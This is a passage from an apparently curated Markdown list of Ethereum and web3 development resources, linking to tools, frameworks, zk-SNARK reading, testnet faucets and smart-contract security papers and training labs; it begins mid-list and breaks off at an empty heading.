dApps\n\n- Get familiar with tools that you will be using:\n\n#### Package Managers\n\n- [npm](https://www.npmjs.com/)\n- [yarn](https://yarnpkg.com/lang/en/)\n- [pnpm](https://pnpm.js.org/)\n\n#### IDE's\n\n- [Remix IDE](https://remix.ethereum.org/)\n- [Remix IDE Desktop Release](https://github.com/ethereum/remix-desktop/releases)\n- [Ethfiddle](https://ethfiddle.com/)\n- [labs.superblock](https://superblocks.com/)\n- [Truffle](https://truffleframework.com/)\n- [Solidity v0.8.17](https://docs.soliditylang.org/en/v0.8.17/)\n- [Vyper](https://github.com/vyperlang/vyper)\n- [Atom](https://atom.io/)\n- [Etheratom](https://atom.io/packages/etheratom)\n- [Autocomplete Solidity](https://atom.io/packages/autocomplete-solidity)\n- [Language Solidity](https://atom.io/packages/language-solidity)\n- [Vim solidity](https://github.com/tomlion/vim-solidity)\n- [Vim vyper](https://github.com/vyperlang/vim-vyper)\n- [YAKINDU Solidity Tools](https://github.com/Yakindu/solidity-ide)\n- [VSCode](https://code.visualstudio.com/) with [Solidity Visual Developer](https://marketplace.visualstudio.com/items?itemName=tintinweb.solidity-visual-auditor)\n- [vscode-solidity-lang](https://github.com/contractshark/vscode-solidity-extenstion) Solidity Semantic Highlighting for VSode. 
[available at vscode marketplace](https://marketplace.visualstudio.com/items?itemName=ContractShark.solidity-lang)\n- [MetaMask OpenRPC API Playground](https://metamask.github.io/api-playground/api-documentation/) - View and interact with MetaMask's RPC API\n\n#### Practice\n\n- Learn Ethereum development by making a [Zombie Game](https://cryptozombies.io/)\n- [Yul and Some Solidity Optimizations and Tricks](https://hackmd.io/@gn56kcRBQc6mOi7LCgbv1g/rJez8O8st)\n- Read and make an example: [Pet shop tutorial](https://www.trufflesuite.com/tutorial)\n- Learn how to build smart contracts with Python and Vyper: [Ape Academy](https://academy.apeworx.io/)\n- [Time-locked Wallets: An Introduction to Ethereum Smart Contracts](https://www.toptal.com/ethereum-smart-contract/time-locked-wallet-truffle-tutorial)\n- [The Ultimate ENS and ĐApp Tutorial](https://www.toptal.com/ethereum/ethereum-name-service-dapp-tutorial)\n- [Ultimate Introduction to Ethereum Ðapp Development](https://www.youtube.com/playlist?list=PLV1JDFUtrXpFh85G-Ddyy2kLSafaB9biQ)\n- [Ethernaut](https://ethernaut.zeppelin.solutions/) is a Web3/Solidity based wargame for those interested in learning Ethereum\n- [Ethereum and Solidity: The Complete Developer's Guide](https://www.udemy.com/ethereum-and-solidity-the-complete-developers-guide/)\n- [Consensys best practices](https://consensys.github.io/smart-contract-best-practices/) - This document provides a baseline knowledge of security considerations for intermediate Solidity programmers. 
It is maintained by ConsenSys Diligence, and the broader Ethereum community.\n- [Solidity Patterns](https://github.com/fravoll/solidity-patterns) - A compilation of patterns and best practices.\n- [Smart Contracts Threats DB](https://github.com/crytic/not-so-smart-contracts) - A compilation of the worst patterns.\n- [ETH.build](https://eth.build/) An Educational Sandbox For Web3\n- [Node Guardians](https://nodeguardians.io/) Story-rich Quests with practical coding challenges\n\n# ZK-SNARKs\n\n#### General info\n\n- [ZK-SNARKs-VS-ZK-STARKs](https://graph.org/ZK-SNARKs-VS-ZK-STARKs-01-10)\n- [Why and How zk-SNARK Works: Definitive Explanation](https://arxiv.org/pdf/1906.07221.pdf)\n- [learn.0xparc.org](https://learn.0xparc.org)\n- [ProofsArgsAndZK.pdf](https://people.cs.georgetown.edu/jthaler/ProofsArgsAndZK.pdf)\n- [zk-learning.org](https://zk-learning.org)\n- [zero-knowledge-canon](https://a16zcrypto.com/zero-knowledge-canon)\n- [Introduction to Zero-Knowledge Proofs](https://www.dylandavis.net/blog/2022/12/21/zero-knowledge-proofs-introduction)\n- [Zero-knowledge proof learning journey](https://youtu.be/_6Bm5kmov3A)\n- [zkp.science](https://zkp.science) - All you should know about ZK-SNARKs\n- [ZoKrates](https://github.com/Zokrates/ZoKrates) - A toolbox for zkSNARKS on Ethereum\n- [The AZTEC Protocol](https://github.com/AztecProtocol/AZTEC) - Confidential transactions on the Ethereum network, implementation is live on the Ethereum main-net\n- [Nightfall](https://github.com/EYBlockchain/nightfall) - Make any ERC-20 / ERC-721 token private - open source tools & microservices\n- Proxy Re-encryption (PRE)\n- [NuCypher Network](https://github.com/nucypher/nucypher) - A proxy re-encryption network to empower data privacy in decentralized systems\n- [pyUmbral](https://github.com/nucypher/pyumbral) - Threshold proxy re-encryption cryptographic library\n- Fully Homomorphic Encryption (FHE)\n- [NuFHE](https://github.com/nucypher/nufhe) - GPU accelerated FHE library\n- [Zero 
knowledge proofs starter pack](https://ethresear.ch/t/zero-knowledge-proofs-starter-pack/4519)\n- [ZK-Research DB](https://polished-wash-d17.notion.site/ZK-Research-58f704196c8f4715adc412fa0cf1a17f)\n- [An awesome post from Vitalik.eth](https://vitalik.ca/general/2021/01/26/snarks.html)\n- [Zk snarks under the hood](https://medium.com/@VitalikButerin/zk-snarks-under-the-hood-b33151a013f6)\n- [Awesome zero knowledge proofs](https://github.com/matter-labs/awesome-zero-knowledge-proofs)\n- [Awesome zk](https://github.com/ventali/awesome-zk)\n- [The missing explanation of ZK-SNARKs](https://www.cryptologie.net/article/507/the-missing-explanation-of-zk-snarks)\n- [Why and How zk-SNARK Works](https://arxiv.org/pdf/1906.07221.pdf)\n- [The Zero-Knowledge Landscape](https://page1.substack.com/p/the-zero-knowledge-landscape)\n- [Your Guide to Write zkSNARKs in Go](https://consensys.net/blog/research-development/gnark-your-guide-to-write-zksnarks-in-go)\n- [Building your first zk dapp using snarks & circom](https://hackernoon.com/how-to-use-a-zero-knowledge-dapp-boilerplate)\n- [ZK Tools Directory & Boilerplate](https://boilerplate.zkblock.app/)\n- [A beginner's intro to coding zero-knowledge proofs](https://dev.to/spalladino/a-beginners-intro-to-coding-zero-knowledge-proofs-c56)\n\n#### ZK-STARKs\n\n- [StarkWare](https://github.com/starkware-industries) and [StarkWare Resources](https://github.com/starkware-libs) - StarkEx scalability engine storing state transitions on-chain\n- [zkSNARKs vs zkSTARKs: a primer](https://pseudotheos.mirror.xyz/_LAi4cCFz2gaC-3WgNmri1eTvckA32L7v31A8saJvqg)\n- [Breaking Down Recursive ZK-STARKs](https://medium.com/@Nurnberg_Meistersinger/zk-starks-part-one-4f482111b0a)\n\n# Frameworks\n\n#### Truffle Suite\n\n- [Truffle](https://truffleframework.com/truffle)\n- [Ganache](https://truffleframework.com/ganache)\n- [Drizzle](https://truffleframework.com/drizzle)\n\n#### Akula\n\n- [Akula](https://github.com/akula-bft/akula) - an implementation of 
Ethereum protocol ("client") written in Rust, based on [Erigon](https://github.com/ledgerwatch/interfaces) architecture.\n\n#### ZeppelinOS\n\n- [Getting Started](https://docs.zeppelinos.org/docs/start.html)\n\n#### Labs.Superblock\n\n> Note: Superblocks is deprecated\n\n- [Labs.superblocks](https://lab.superblocks.com/)\n- [dapp Tutorial](https://www.youtube.com/watch?v=LK-kVMzrdno)\n\n#### Infura (A Gateway to Ethereum)\n\n- [Mainnet End Point](https://infura.io/)\n- [Ropsten TestNet End Point](https://infura.io/)\n- [Kovan TestNet End Point](https://infura.io/)\n- [Rinkeby TestNet End Point](https://infura.io/)\n- [IPFS](https://medium.freecodecamp.org/hands-on-get-started-with-infura-and-ipfs-on-ethereum-b63635142af0)\n\n#### [NodeReal](https://nodereal.io) (A high-performance node service)\n\n- [Meganode](https://meganode.nodereal.io)\n- [DirectRoute](https://directroute.nodereal.io)\n\n#### Other Frameworks\n\n- [Frameworks List](https://ethereum.org/en/developers/docs/frameworks/) - Ethereum Frameworks Listing.\n- [Hardhat](https://hardhat.org/) - Flexible, extensible and fast Ethereum development environment.\n- [Ape](https://docs.apeworx.io/ape/stable/) - The smart contract development tool for Pythonistas, Data Scientists, and Security Professionals.\n- [Brownie](https://github.com/iamdefinitelyahuman/brownie) - Brownie is a Python framework for deploying, testing and interacting with Ethereum smart contracts.\n- [Embark](https://github.com/embark-framework/embark) - Framework for DApp development\n- [Waffle](https://getwaffle.io/) - Framework for advanced smart contract development and testing, small, flexible, fast (based on ethers.js)\n- [Etherlime](https://github.com/LimeChain/etherlime) - ethers.js based framework for Dapp deployment\n- [Parasol](https://github.com/Lamarkaz/parasol) - [Deprecated] Agile smart contract development environment with testing, INFURA deployment, automatic contract documentation and more. 
It features a flexible and unopinionated design with unlimited customizability\n- [0xcert](https://github.com/0xcert/framework/) - JavaScript framework for building decentralized applications\n- [OpenZeppelin SDK](https://openzeppelin.com/sdk/) - OpenZeppelin SDK: A suite of tools to help you develop, compile, upgrade, deploy and interact with smart contracts.\n- [sbt-ethereum](https://sbt-ethereum.io/) - A tab-completey, text-based console for smart-contract interaction and development, including wallet and ABI management, ENS support, and advanced Scala integration.\n- [Cobra](https://github.com/cobraframework/cobra) - A fast, flexible and simple development environment framework for Ethereum smart contract, testing and deployment on Ethereum virtual machine(EVM).\n- [Ether Jar](https://github.com/emeraldpay/etherjar) Java integration library for Ethereum blockchain\n- [Starport](https://github.com/tendermint/starport) - A CLI tool for building sovereign IBC-enabled blockchains.\n- [Sign in with Ethereum | SIWE](https://github.com/spruceid/siwe)- Workflow to authenticate Ethereum accounts using message signing in order to establish a cookie-based web session that manages user metadata.\n- [Foundry](https://github.com/onbjerg/foundry-book) - A smart contract development toolchain for project compilation, dependency management, testing, deployments, on-chain interactions...\n- [Solmate](https://github.com/Rari-Capital/solmate) - These contracts have been audited but they were not developed with users in mind. 
They mainly seek to optimize gas and optimizations for smart contract development\n- [Supercool](https://docs.supercool.xyz/) - Relayer infra for meta-transaction and account-abstraction superpowers: automate smart contract interactions, create gasless transactions, and more.\n\n#### Interacting with Smart Contracts\n\n- [Web3.js](https://web3js.readthedocs.io/en/1.0/)\n- [Web3.py](https://web3py.readthedocs.io/en/stable/)\n- [Web3j](https://docs.web3j.io/latest/)\n- [ethers.js](https://docs.ethers.io/v5/)\n- [Web3 by Example : Web3 by Example is a hands-on introduction to web3 development using annotated example programs.](https://www.web3byexample.com/)\n\n#### Python Ethereum Ecosystem\n- [Ethereum.org](https://ethereum.org/en/developers/docs/programming-languages/python/)\n- [Article](https://medium.com/@pipermerriam/the-python-ethereum-ecosystem-101bd9ba4de7)\n\n#### Distributed Storage Systems\n\n- [Arweave](https://arweave.org)\n- [INFO](https://medium.com/bitfwd/what-is-decentralised-storage-ipfs-filecoin-sia-storj-swarm-5509e476995f)\n- [IPFS](https://ipfs.io/)\n- [MESON](https://meson.network/)\n- [SWARM](https://swarm-gateways.net/)\n- [Storj](https://storj.io/)\n- [Sia](https://sia.tech/)\n\n#### Test Blockchain Networks\n\n- [Paradigm Faucet](https://faucet.paradigm.xyz) - claim testnet ETH here\n- [Ethnode](https://github.com/vrde/ethnode) - Run an Ethereum node (Geth or Parity) for development, as easy as `npm i -g ethnode && ethnode`.\n- [Ganache](https://github.com/trufflesuite/ganache) - App for test Ethereum blockchain with visual UI and logs\n- [Kaleido](https://kaleido.io/) - Use Kaleido for spinning up a consortium blockchain network. 
Great for PoCs and testing\n- [Besu Private Network](https://besu.hyperledger.org/en/stable/Tutorials/Quickstarts/Azure-Private-Network-Quickstart/) - Run a private network of Besu nodes in a Docker container\n- [Orion](https://github.com/PegaSysEng/orion) - Component for performing private transactions by PegaSys\n- [Artemis](https://github.com/PegaSysEng/artemis) - Java implementation of the Ethereum 2.0 Beacon Chain by PegaSys\n- [Cliquebait](https://github.com/f-o-a-m/cliquebait) - Simplifies integration and accepting testing of smart contract applications with docker instances that closely resembles a real blockchain network\n- [Local Raiden](https://github.com/ConsenSys/Local-Raiden) - Run a local Raiden network in docker containers for demo and testing purposes\n- [Private networks deployment scripts](https://github.com/ConsenSys/private-networks-deployment-scripts) - Out-of-the-box deployment scripts for private PoA networks\n- [Local Ethereum Network](https://github.com/ConsenSys/local_ethereum_network) - Out-of-the-box deployment scripts for private PoW networks\n- [Ethereum on Azure](https://docs.microsoft.com/en-us/azure/blockchain/templates/ethereum-poa-deployment) - Deployment and governance of consortium Ethereum PoA networks\n- [Ethereum on Google Cloud](https://console.cloud.google.com/marketplace/details/click-to-deploy-images/ethereum?filter=category:developer-tools) - Build Ethereum network based on Proof of Work\n- [Infura](https://infura.io/) - Ethereum API access to Ethereum networks (Mainnet, Ropsten, Rinkeby, Goerli, Kovan)\n- [CloudFlare Distributed Web Gateway](https://cloudflare.com/distributed-web-gateway/) - Provides access to the Ethereum network through the Cloudflare instead of running your own node\n- [Chainstack](https://chainstack.com/) - Shared and dedicated Ethereum nodes as a service (Mainnet, Ropsten, Rinkeby)\n- [Alchemy](https://alchemyapi.io/) - Blockchain Developer Platform, Ethereum API, and Node Service (Mainnet, 
Ropsten, Rinkeby, Goerli, Kovan)\n- [ZMOK](https://zmok.io/) - JSON-RPC Ethereum API (Mainnet, Rinkeby, Front-running Mainnet)\n- [Watchdata](https://watchdata.io) - Provide simple and reliable API access to Ethereum blockchain\n\n#### Test Ether Faucets\n\n- [Sepolia Faucet](https://sepoliafaucet.com/)\n- [Mumbai Faucet](https://mumbaifaucet.com/)\n- [Goerli faucet](https://goerli-faucet.slock.it/)\n- [Universal faucet](https://faucets.blockxlabs.com/)\n- [Nethereum.Faucet](https://github.com/Nethereum/Nethereum.Faucet) - A C#/.NET faucet\n\n# Front End\n\n#### UI Components\n\n- Learn React on [official website](https://reactjs.org/tutorial/tutorial.html) or complete some [courses](https://egghead.io/courses/the-beginner-s-guide-to-react)\n- [React Roadmap](https://github.com/adam-golab/react-developer-roadmap)\n- [aragonUI](https://ui.aragon.org) - A React library including Dapp components\n- [components.bounties.network](https://components.bounties.network) - A React library including Dapp components\n- [ui.decentraland.org](https://github.com/decentraland/ui) - A React library including Dapp components\n- [dapparatus](https://github.com/austintgriffith/dapparatus) - Reusable React Dapp components\n- [Metamask ui](https://github.com/MetaMask/metamask-storybook) - Metamask React Components\n- [DappHybrid](https://github.com/Nethereum/Nethereum.DappHybrid) - A cross-platform hybrid hosting mechanism for web based decentralised applications\n- [Nethereum.UI.Desktop](https://github.com/Nethereum/Nethereum.UI.Desktop) - Cross-platform desktop wallet sample\n- [eth-button](https://eth-button.github.io/eth-button/) - Minimalist donation button\n- [Rimble Design System](https://rimble.consensys.design/) - Adaptable components and design standards for decentralized applications.\n- [brave-ui](https://github.com/brave/brave-ui) - List of reusable React components to empower your brave UI\n- [DApp frontend 
security](https://blog.embarklabs.io/news/2020/01/30/dapp-frontend-security/index.html) - In this article, Author will take a look at security for DApps.\n\n# Project management\n\n- [Dework](https://dework.xyz/) | Web3 Trello with token payments, credentials, bounties...\n- [Wonderverse](https://www.wonderverse.xyz/) | Jira alternative with an intuitive task management system that allows DAOs to pay contributors and collaborate in their projects.\n\n# Important (security)\n\n- [Building Secure Smart Contracts](https://secure-contracts.com/)\n- [SCSVS](https://github.com/ComposableSecurity/SCSVS)\n- [Solidity audits and secure development material](https://github.com/jcr-security/solidity-security-teaching-resources)\n- [SCSVSv2](https://github.com/ComposableSecurity/SCSVS)\n- [Valuable Resources for Web3 Security](https://github.com/ZhangZhuoSJTU/Web3Bugs#valuable-resources-for-web3-security)\n\n# Further Readings\n\n#### Inspired by:\n\n- [ETH Dapp Developer Roadmap](https://github.com/thecryptoshed/eth-dapp-developer-roadmap)\n- [DeFi Defence DAO Tools](https://github.com/defi-defense-dao/defi-risk-tools-list#developer-tools)\n- [Blockchain Learning Path](https://github.com/protofire/blockchain-learning-path)\n- [ADF](https://github.com/ong/awesome-decentralized-finance)\n- [DeFi Toolkit](https://github.com/gweicz/defi-toolkit)\n- [BlockTools](https://github.com/nujabes403/blockchains-tools)\n- [SAW List](https://simpleaswater.com/defi/#analytics)\n- [Public APIs](https://github.com/public-apis/public-apis#cryptocurrency)\n- [BTC List](https://github.com/igorbarinov/awesome-bitcoin)\n- [ConsenSys](https://github.com/ConsenSys/ethereum-developer-tools-list)\n- [EVM Tools](https://github.com/CoinCulture/evm-tools)\n- [Solidity Pro](https://github.com/bkrem/awesome-solidity)\n- [Zhihu Research Base](https://zhuanlan.zhihu.com/p/265374061)\n- [OpenZeppelin - Contracts / Test Helpers + More ](https://github.com/OpenZeppelin)\n- [Awesome Ethereum Resource 
Lists](https://medium.com/quiknode/awesome-ethereum-resource-lists-dd28a9c17fc1)\n- [Comprehensive Ethereum Developer Resource List](https://github.com/ConsenSys/ethereum-developer-tools-list/blob/master/README.md)\n- [Smart Contract Learning](https://github.com/arbazkiraak/SmartContractLearning)\n- [Awesome Cryptoeconomics](https://github.com/jpantunes/awesome-cryptoeconomics)\n- [Tudelft Repo](https://repository.tudelft.nl)\n- [The Reading List](https://www.decentralised.co/the-reading-list) and [This repo](https://github.com/sambacha/compendium) with [Engineering Data List](https://github.com/sambacha/art-of-engineering/blob/master/ENGINEERING_ART_OF.md)\n- [Eth Reentrancy Attack Patterns](https://github.com/uni-due-syssec/eth-reentrancy-attack-patterns)\n- [Plugin for testing smart contracts](https://github.com/meherett/pytest-eth)\n- [Solidity function profiler](https://github.com/EricR/sol-function-profiler)\n- [Smart Contract Attack Vectors](https://github.com/KadenZipfel/smart-contract-attack-vectors)\n- [DeFi security list](https://github.com/freight-chain/defi-sec)\n- [DeFi Threats Base](https://github.com/freight-trust/defi-threat)\n- [Hacking](https://github.com/geekshiv/Smart-Contract-Hacking)\n- [Secureum Bootcamp](https://hackmd.io/@secureum/bootcamp-epoch0-announcement)\n- [SCSVS](https://github.com/securing/SCSVS)\n- [Smart Contract Inspector](https://github.com/tintinweb/smart-contract-inspector)\n- [Blocksec ctfs](https://github.com/openblocksec/blocksec-ctfs)\n- [Builder List](https://based.builders)\n- [From 0 to Web3.0](https://github.com/kay-is/web3-from-zero)\n\n#### Security & Safety:\n\n- [All known smart contract side and user side attacks](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)\n- [All ETH Sec tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [Solidity Cheatsheet Pack](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [All about NFT 
security](https://graph.org/NFT-security-01-28)\n- [Visit my Blog](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n- [Visit blog.pessimistic.io](https://blog.pessimistic.io/)\n- [All resources to become a smart contract auditor!](https://telegra.ph/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [How to become a smart contract auditor](https://cmichel.io/how-to-become-a-smart-contract-auditor)\n- [Blockchain Security Genesis](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html)\n- [Intro security hacking smart contracts on Ethereum](https://www.notonlyowner.com/learn/intro-security-hacking-smart-contracts-ethereum)\n- [Books & Researches](https://telegra.ph/Books--Researches-01-30)\n- [Per Aspera ad Astra](https://officercia.mirror.xyz/FvMKbibx7gDlufgZSkmYn77CI8HPBsVCeqUKmpXHr0k)\n\n#\n\n- [Blockchain Security Roadmap](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html) - This article will be laying down a path/roadmap, following which users will easily enter into the field of Blockchain Security together.\n- [ The Eye of Horus: Spotting and Analyzing Attacks on Ethereum Smart Contracts](https://arxiv.org/pdf/2101.06204.pdf) -Investigation shows that the number of attacks did not necessarily decrease over the past few years, but for some vulnerabilities remained constant.\n- [Analysis of Bitcoin Vulnerability to Bribery Attacks Launched Through Large Transactions](https://arxiv.org/pdf/2105.07501.pdf) - In this paper, authors design a novel bribery attack and show that this guarantee can be hugely undermined.\n- [Vulnerability of Blockchain Technologies to Quantum Attacks](https://arxiv.org/pdf/2105.01815.pdf) - Here authors analyze the major blockchain-based cryptocurrencies deployed today -- including Bitcoin, Ethereum, Litecoin and ZCash, and determine risk exposure to quantum attacks.\n- [BLOCKEYE](https://arxiv.org/pdf/2103.02873.pdf) - Hunting For DeFi Attacks on Blockchain. 
In this paper, authors proposed BLOCKEYE, a real-time attack detection system for DeFi projects on the Ethereum blockchain.\n- [Topological Anomaly Detection in Dynamic Multilayer Blockchain Networks](https://arxiv.org/pdf/2106.01806.pdf) - Authors introduce a new topological perspective to structural anomaly detection in dynamic multilayer networks.\n- [Verification of the Incremental Merkle Tree Algorithm with Dafny](https://arxiv.org/pdf/2105.06009.pdf) - Authors present our new and original correctness proof of the algorithm along with the Dafny machine-checkable version.\n- [GoHammer Blockchain Performance Test Tool](https://arxiv.org/pdf/2105.00847.pdf) - This tool will help in developing more efficient decentralized systems and will affect decreasing the costs of developing decentralized application projects.\n- [EtherClue: Digital investigation of attacks on Ethereum smart contracts ](https://arxiv.org/pdf/2104.05293.pdf) - In this work, authors study the problem of post-factum investigation of Ethereum attacks using Indicators of Compromise specially crafted for use in the blockchain.\n- [Requirement Analyses and Evaluations of Blockchain Platforms per Possible Use Cases](https://arxiv.org/pdf/2103.03209.pdf) - This document provides a generic model of understanding blockchain and its applications.\n- [A Note on Privacy in Constant Function Market Makers](https://arxiv.org/pdf/2103.01193.pdf) - In this note, authors show that privacy is impossible with the usual implementations of CFMMs under most reasonable models of an adversary and provide some mitigating strategies.\n- [A Survey of Security Vulnerabilities in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.06974.pdf) - This paper explains eight vulnerabilities that are specific to the application level of BT by analyzing the exploitation case scenarios of these vulnerabilities.\n- [An approach to detect Denial of Service Vulnerability in Ethereum Smart 
Contracts](https://arxiv.org/pdf/2106.01340.pdf) - In this paper, authors propose a framework that combines static and dynamic analysis to detect DoS due to an unexpected revert in ETH Smart Contracts.\n- [AGSolT: a Tool for Automated Test-Case Generation for Solidity Smart Contracts](https://arxiv.org/pdf/2102.08864.pdf) - Authors found that AGSolT is capable of achieving high branch coverage with both approaches and even discovered some errors in some of the most popular Solidity smart contracts on Github.\n- [Temporal-Amount Snapshot MultiGraph for Ethereum Transaction Tracking](https://arxiv.org/pdf/2102.08013.pdf) - Authors propose TASMG to model Ethereum transaction records as a temporal-amount network and then present TAW to effectively embed accounts via their transaction records, which integrates temporal and amount information of the proposed network.\n- [Demystifying Cryptocurrency Mining Attacks: A Semi-supervised Learning Approach Based on Digital Forensics and Dynamic Network Characteristics](https://arxiv.org/pdf/2102.10634.pdf) - This paper addresses the detection of crypto mining attacks in a generic network environment using dynamic network characteristics.\n- [FASTEN: Fair and Secure Distributed Voting Using Smart Contracts](https://arxiv.org/pdf/2102.10594.pdf) - Authors prove that the probability of privacy breaches is negligibly small. 
Further, cost analysis of executing FASTEN over Ethereum is comparable to most of the existing cost of elections.\n- [Interdependencies between Mining Costs, Mining Rewards and Blockchain Security](https://arxiv.org/pdf/2102.08107.pdf) - This paper studies to what extent the cost of operating a proof-of-work blockchain is intrinsically linked to the cost of preventing attacks, and to what extent the underlying digital ledger security budgets are correlated with the cryptocurrency market outcomes\n- [HyperSec: Visual Analytics for blockchain security monitoring](https://arxiv.org/pdf/2103.14414.pdf) - HyperSec, a visual analytics monitoring tool that provides relevant information at a glance to detect ongoing attacks on Hyperledger Fabric.\n- [Reentrancy Vulnerability Identification in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.02881.pdf) - In this paper, authors present a framework that combines static and dynamic analysis to detect Reentrancy vulnerabilities in Ethereum smart contracts.\n- [A General Framework for the Security Analysis of Blockchain Protocols](https://arxiv.org/pdf/2009.09480v2.pdf) - This paper presents a parsimonious abstraction sufficient for capturing and comparing properties of many well-known permissionless blockchain protocols.\n- [Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities](https://arxiv.org/pdf/2104.06540.pdf) - The paper is aimed at security testers aiming to start out in blockchain security reviews and blockchain developers as a reference on common pitfalls.\n- [Vulnerabilities and Open Issues of Smart Contracts: A Systematic Mapping](https://arxiv.org/pdf/2104.12295.pdf) - This paper conducted a systematic literature mapping identifying initiatives and tools to analyze SCs and how to deal with the identified vulnerabilities.\n- [SuMo: A Mutation Testing Strategy for Solidity Smart Contracts](https://arxiv.org/pdf/2105.03626.pdf) - Authors report a first evaluation of SuMo on open-source 
projects for which test suites were available. The results authors got are encouraging, and they suggest that SuMo can effectively help developers to deliver more reliable smart contracts.\n- [(In)Stability for the Blockchain: Deleveraging Spirals and Stablecoin Attacks](https://arxiv.org/pdf/1906.02152.pdf) - The possibility of deleveraging spirals was first predicted in the initial release of this paper in 2019 and later observed in the Black Thursday crisis in Dai in 2020.\n- [An Anonymous Trust-Marking Scheme on Blockchain Systems](https://arxiv.org/pdf/2010.00206.pdf) - In this paper, authors propose an anonymous trust-marking scheme on blockchain systems that is universally applicable to any cryptocurrency.\n- [A Framework and DataSet for Bugs in Ethereum Smart Contracts](https://arxiv.org/pdf/2009.02066.pdf) - In this paper, to fill the gap, authors first collect as many smart contract bugs as possible from multiple sources and divide these bugs into 9 categories by extending the IEEE Standard Classification for Software Anomalies.\n- [Bitwise Operations and Bit Manipulation in Solidity, Ethereum](https://medium.com/@imolfar/bitwise-operations-and-bit-manipulation-in-solidity-ethereum-1751f3d2e216)\n- [BitMaps](https://soliditydeveloper.com/bitmaps)\n- [Reentrancy Guard 2.0](https://medium.com/spherex-technologies/reentrancy-guard-2-0-cbbc0be41634)\n- [A Secure Multi-chains Consensus Scheme Against Diverse Miners Behaviors Attacks in Blockchain Networks.](https://arxiv.org/pdf/2106.02383.pdf) - Experimental results show that PoDT is secure against DMB attacks and more effective than traditional consensus schemes in multi-chains environments.\n- [A Survey on Consortium Blockchain Consensus Mechanisms](https://arxiv.org/pdf/2102.12058.pdf) - This paper highlights several state-of-the-art solutions in consensus algorithms for enterprise blockchain.\n- [Extracting Smart Contracts Tested and Verified in Coq](https://arxiv.org/pdf/2012.09138.pdf) - Authors 
implement extraction of Coq programs to functional languages based on MetaCoq's certified erasure.\n- [Trustless, privacy-preserving blockchain bridges](https://arxiv.org/pdf/2102.04660.pdf) - In this paper, authors present a protocol for facilitating trust-less cross-chain cryptocurrency transfers that preserve privacy of bridge withdrawals.\n- [Security checklists for Ethereum smart contract development: patterns and best practices](https://arxiv.org/pdf/2008.04761.pdf) - Authors cover the phases of design, coding, and testing and deployment of the software lifecycle.\n- [Dynamic Vulnerability Detection on Smart Contracts Using Machine Learning](https://arxiv.org/pdf/2102.07420.pdf) - In this work authors propose Dynamit, a monitoring framework to detect reentrancy vulnerabilities in Ethereum smart contracts.\n- [Targeting the Weakest Link: Social Engineering Attacks in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.00132.pdf) - In this work, authors explore the possibility and existence of new social engineering attacks beyond smart contract honeypots.\n- [OptSmart: A Space Efficient Optimistic Concurrent Execution of Smart Contracts](https://arxiv.org/pdf/2102.04875.pdf) - In this paper, authors develop a concurrent miner that proposes a block by executing the AUs concurrently using optimistic Software Transactional Memory systems (STMs).\n- [DEFECTCHECKER: Automated Smart Contract Defect Detection by Analyzing EVM Bytecode](https://arxiv.org/pdf/2009.02663.pdf) - Experimental results show that DefectChecker performs much better than these tools in terms of both speed and accuracy.\n- [SmartBugs: A Framework to Analyze Solidity Smart Contracts](https://arxiv.org/pdf/2007.04771.pdf) - Authors show how it enables easy integration and comparison of analysis tools by presenting a new extension to the tool SmartCheck that improves substantially the detection of vulnerabilities related to the DASP10 categories Bad Randomness, Time Manipulation, and Access 
Control (identified vulnerabilities increased from 11% to 24%).\n- [Profiling Gas Leaks in Solidity Smart Contracts](https://arxiv.org/pdf/2008.05449.pdf) - In this paper, authors identify a set of 19 Solidity code smells affecting the deployment and transaction costs of a smart contract, and assess the relevance of such smells through a survey involving 34 participants.\n- [Securing Parallel-chain Protocols under Variable Mining Power](https://arxiv.org/pdf/2105.02927.pdf) - In this paper, authors consider the design of provably secure parallel-chain protocols which can adapt to such mining power variations.\n- [Ethereum SmartContract Vulnerability Detection using Deep Neural Network and Transfer Learning](https://arxiv.org/pdf/2103.12607.pdf) - ESCORT framework enables transfer learning on new vulnerability types with minimal modification of the DNN model architecture and re-training overhead.\n- [SCSGuard: Deep Scam Detection for Ethereum Smart Contracts](https://arxiv.org/pdf/2105.10426.pdf) - Experimental results manifest that SCSGuard achieves high accuracy (0.94), precision (0.96%) and recall (0.98) for both Ponzi and Honeypot scams, and new Phishing smart contracts.\n- [Securing Cyber-Physical Systems Through Blockchain-Based Digital Twins and Threat Intelligence](https://arxiv.org/pdf/2105.08886.pdf) - This article focuses on securing CPSs by integrating Artificial Intelligence (AI) and blockchain for intelligent and trusted DTs.\n- [A Survey on Blockchain Interoperability: Past, Present, and Future Trends](https://arxiv.org/abs/2005.14282) - In this post, authors study blockchain interoperability techniques and solutions, providing a holistic overview of blockchain interoperability, paving the way for systematic research in this domain.\n- [SoK: Transparent Dishonesty: front-running attacks on Blockchain](https://arxiv.org/abs/2106.00667) - A paper on secure smart contract designs decisions and front-running possibilities on DApps.\n- [SoK: Oracles from 
the Ground Truth to Market Manipulation](https://arxiv.org/abs/2106.00667) - A paper that systemizes the design alternatives for oracles, showcases attacks, and discusses attack mitigation strategies.\n\n##### Web2 cybersecurity\n\n- [TryHackMe: Complete rooms with challenges and puzzles to break, all from the browser](https://tryhackme.com/welcome) - Hands on cybersecurity training with real-world tasks\n- [Disclose: Cross-industry and vendor-agnostic standards for best practices in cybersecurity research](https://disclose.io/) - Open source maintainers and industry experts providing a central source for assistance, information, and help via templates, tools, data sets...\n- [Hack The Box](https://www.hackthebox.com/) - A Hacker's playground to dynamically and compete against other users in a collaborative ecosystem that promotes hands-on training experience\n- [OverTheWire](https://overthewire.org/wargames/) - Set of wargames and challenges offered by a community to learn and practice security concepts in fun wargames.\n- [Pentesterlab](https://pentesterlab.com/) - Hands-on labs covering different bug classes from basic to advanced.\n- [Portswigger labs](https://portswigger.net/web-security/all-labs) - Set of web application security labs with attached community solutions\n- [Vulnhub](https://www.vulnhub.com/) - Users upload "challenge boxes" that often attempt to gain root access by exploiting known vulnerabilities.\n\n##### Web3 cybersecurity\n\n- 